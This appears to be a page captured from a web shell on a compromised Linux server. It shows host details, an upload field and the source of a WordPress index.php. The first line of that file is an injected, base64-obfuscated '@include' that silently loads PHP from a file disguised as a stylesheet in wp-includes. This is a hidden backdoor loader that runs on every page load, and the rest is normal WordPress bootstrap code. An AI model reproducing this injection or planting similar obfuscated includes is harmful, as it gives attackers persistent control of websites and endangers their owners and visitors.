Server : Apache System : Linux enhance01.hostingraja.org 5.15.0-144-generic #157-Ubuntu SMP Mon Jun 16 07:33:10 UTC 2025 x86_64 User : webdemo_4 ( 4864) PHP Version : 7.4.33 Disable Function : NONE Directory : /proc/self/cwd/ |
Upload File : |
<?php @include base64_decode("L3Zhci93d3cvY2I5NWNlOTgtNjExNS00NWQxLTk5YWQtMGVlOWMwZjI3MjQ3L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2Jsb2Nrcy9jb3Zlci9zdHlsZS1yZWwuY3Nz");?><?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }